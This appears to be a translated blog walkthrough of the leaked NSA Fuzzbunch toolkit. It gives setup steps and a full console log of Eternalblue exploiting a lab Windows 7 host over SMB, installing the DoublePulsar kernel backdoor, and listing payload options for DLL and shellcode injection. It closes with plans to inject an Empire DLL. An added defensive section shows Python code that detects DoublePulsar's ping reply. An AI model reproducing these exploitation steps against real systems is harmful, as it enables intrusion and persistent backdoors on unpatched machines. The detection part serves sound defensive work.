Let's take a look at the NSA's hacking tools.
Download them from GitHub.
Beforehand, download Python 2.6.6 (32-bit) and Pywin32 v2.12.
Use fb.py inside the windows folder. I think this fb.py is what becomes Fuzzbunch.
Fuzzbunch is said to be a vulnerability verification tool. To me it looks like nothing but an attack tool.
The following error occurs, so create the listeningposts folder in advance.
WindowsError: [Error 3] The system cannot find the path specified: 'C:\\shadowbroker-master\\windows\\listeningposts/*.*'
Run it with python and execute Eternalblue.
[*] Set it to "NO" so that Redirection goes OFF? (← needs investigation)
PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================
  0) prompt confirm
  1) execute

Exploit Autorun List
====================
  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Special Autorun List
====================
  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Payload Autorun List
====================
  0) apply
  1) prompt confirm
  2) execute

[+] Set FbStorage => C:\shadowbroker-master\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] :
...
[*] Initializing Global State
[+] Set TargetIp => 10.0.2.4
[+] Set CallbackIp => 10.0.2.5
[+] Redirection ON
[+] Set LogDir => C:\shadowbroker-master\shadowbroker-master\windows\logs\test\z10.0.2.4
[+] Set Project => test

fb > use Et
Eternalblue
Eternalchampion
Eternalromance
Eternalsynergy
fb > use Eternalblue
...
[*] Target :: Operating System, Service Pack, and Architecture of target OS
  0) XP         Windows XP 32-Bit All Service Packs
 *1) WIN72K8R2  Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 1
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
 *0) DANE  Forward deployment via DARINGNEOPHYTE
  1) FB    Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
...
[?] Press Any Key To Continue :

Module: Eternalblue
===================
Name                Set Value   Redirected Value
----                ---------   ----------------
DaveProxyPort       0
NetworkTimeout      60
TargetIp            10.0.2.4    127.0.0.1
TargetPort          445         445
VerifyTarget        True
VerifyBackdoor      True
MaxExploitAttempts  3
GroomAllocations    12
ShellcodeBuffer
Target              WIN72K8R2
[?] Execute Plugin? [Yes] : Yes
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
0x00000010  72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63  rise 7601 Servic
0x00000020  65 20 50 61 63 6b 20 31 00                       e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
....DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00  ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
The exploit log first reports "Backdoor not installed, game on" and, after the SMB pool grooming and the overwrite, "Backdoor installed": Eternalblue itself plants a backdoor on the target and then pings it to confirm success.
I had assumed Doublepulsar was the backdoor.
fb Special (Eternalblue) > show Payload

Plugin Category: Payload
========================

Name           Version
----           -------
Doublepulsar   1.3.1
Jobadd         1.1.1
Jobdelete      1.1.1
Joblist        1.1.1
Pcdlllauncher  2.3.1
Processlist    1.1.1
Regdelete      1.1.1
Regenum        1.1.1
Regread        1.1.1
Regwrite       1.1.1
Rpcproxy       1.0.1
Smbdelete      1.1.1
Smblist        1.1.1
Smbread        1.1.1
Smbwrite       1.1.1
Doublepulsar is listed as one of the payload plugins available from the Eternalblue context. As its parameters below show (TargetPort is "Port used by the Double Pulsar back door", and its Ping function is "Test for presence of backdoor"), this plugin is the client side that talks to the backdoor the exploit just installed.
fb Special (Eternalblue) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.0.2.4
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================
Name            Value
----            -----
NetworkTimeout  60
TargetIp        10.0.2.4
TargetPort      445
OutputFile
Protocol        SMB
Architecture    x86
Function        OutputInstall
...
[*] TargetIp :: Target IP Address
[?] TargetIp [10.0.2.4] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
 *0) SMB  Ring 0 SMB (TCP 445) backdoor
  1) RDP  Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
 *0) x86  x86 32-bits
  1) x64  x64 64-bits
[?] Architecture [0] :
[*] Function :: Operation for backdoor to perform
 *0) OutputInstall  Only output the install shellcode to a binary file on disk.
  1) Ping           Test for presence of backdoor
  2) RunDLL         Use an APC to inject a DLL into a user mode process.
  3) RunShellcode   Run raw shellcode
  4) Uninstall      Remove's backdoor from system
[?] Function [0] :
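The "Pinging backdoor..." step in the Eternalblue log and the Ping function of the Doublepulsar plugin are the same check a defender can run from the other side: the DoublePulsar SMB backdoor answers a Trans2 SESSION_SETUP request with multiplex ID 0x51, whereas a clean Windows host simply echoes the multiplex ID it was sent (0x41). Below is an added example (not code from the page, nor from Fuzzbunch or the public DoublePulsar scanners) that parses a raw SMB1 reply and renders that verdict; the two replies it is run against are constructed sample packets, and the header flag, TID, PID and UID values in them are arbitrary filler for the sample. A live probe would need the preceding SMB negotiate, session setup and tree connect to IPC$ before sending the ping, which this example deliberately leaves out.

```python
import struct

# SMB1 constants (MS-CIFS). The 32-byte SMB header follows a 4-byte NetBIOS session header.
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
STATUS_NOT_IMPLEMENTED = 0xC0000002

# The Trans2 SESSION_SETUP "ping" is sent with multiplex ID 0x41. A clean host echoes
# it back; the DoublePulsar kernel hook answers with 0x51 instead.
PING_MID = 0x41
DOUBLEPULSAR_PING_MID = 0x51

# Layout of the 28 bytes that follow the \xffSMB magic:
# Command, Status, Flags, Flags2, PIDHigh, Signature(8), Reserved, TID, PIDLow, UID, MID
_SMB1_HEADER_FMT = "<BIBHH8sHHHHH"


def parse_smb1_header(packet):
    """Return the NetBIOS session header and SMB1 header fields of a raw reply as a dict."""
    if len(packet) < 36:
        raise ValueError("need at least NetBIOS (4) + SMB1 header (32) bytes")
    nb_type = packet[0]
    nb_length = int.from_bytes(packet[1:4], "big")
    hdr = packet[4:36]
    if hdr[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message (bad magic)")
    (command, status, flags, flags2, pid_high, signature, _reserved,
     tid, pid_low, uid, mid) = struct.unpack(_SMB1_HEADER_FMT, hdr[4:])
    return {
        "nb_type": nb_type, "nb_length": nb_length,
        "command": command, "status": status, "flags": flags, "flags2": flags2,
        "pid": (pid_high << 16) | pid_low, "signature": signature,
        "tid": tid, "uid": uid, "mid": mid,
    }


def doublepulsar_present(ping_response):
    """Decide from the reply to a Trans2 SESSION_SETUP ping whether DoublePulsar is resident.

    Both a clean host and an infected one answer with an error status, so the status
    word is not the signal; the multiplex ID is.
    """
    h = parse_smb1_header(ping_response)
    if h["command"] != SMB_COM_TRANSACTION2:
        raise ValueError("reply is not to a Trans2 request (command 0x%02x)" % h["command"])
    return h["mid"] == DOUBLEPULSAR_PING_MID


def build_trans2_reply(mid, status=STATUS_NOT_IMPLEMENTED, signature=b"\x00" * 8):
    """Construct a minimal Trans2 error reply (constructed sample data for offline testing)."""
    hdr = SMB_MAGIC + struct.pack(
        _SMB1_HEADER_FMT,
        SMB_COM_TRANSACTION2, status,
        0x98,    # Flags: this is a reply (sample value)
        0xC807,  # Flags2: Unicode, NT status codes, long names (sample value)
        0, signature, 0,
        0x0800,  # TID, arbitrary for the sample
        0xFEFF,  # PID low, arbitrary for the sample
        0x0800,  # UID, arbitrary for the sample
        mid,
    )
    body = b"\x00\x00\x00"  # WordCount = 0, ByteCount = 0: an empty error body
    return b"\x00" + len(hdr + body).to_bytes(3, "big") + hdr + body


# Constructed samples: what a clean host and a DoublePulsar host would send back to the ping.
CLEAN_REPLY = build_trans2_reply(PING_MID)
BACKDOORED_REPLY = build_trans2_reply(DOUBLEPULSAR_PING_MID,
                                      signature=b"\x12\x34\x56\x78" + b"\x00" * 4)


if __name__ == "__main__":
    for label, pkt in (("clean host", CLEAN_REPLY), ("infected host", BACKDOORED_REPLY)):
        h = parse_smb1_header(pkt)
        print("%-13s status=0x%08x mid=0x%02x -> DoublePulsar present: %s"
              % (label, h["status"], h["mid"], doublepulsar_present(pkt)))
```

To use this against a real host, open a TCP 445 session, complete negotiate, session setup and tree connect to IPC$, send a Trans2 request with subcommand SESSION_SETUP (0x000E) and multiplex ID 0x41, and pass the raw reply to doublepulsar_present. Only the multiplex ID is compared, because both outcomes return an error status.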
So this RunDLL is how you shove the actual malware onto the target. I'm impressed at how well-made the tool is, with good usability too.
Next time I'll try sending in a DLL generated with EMPIRE.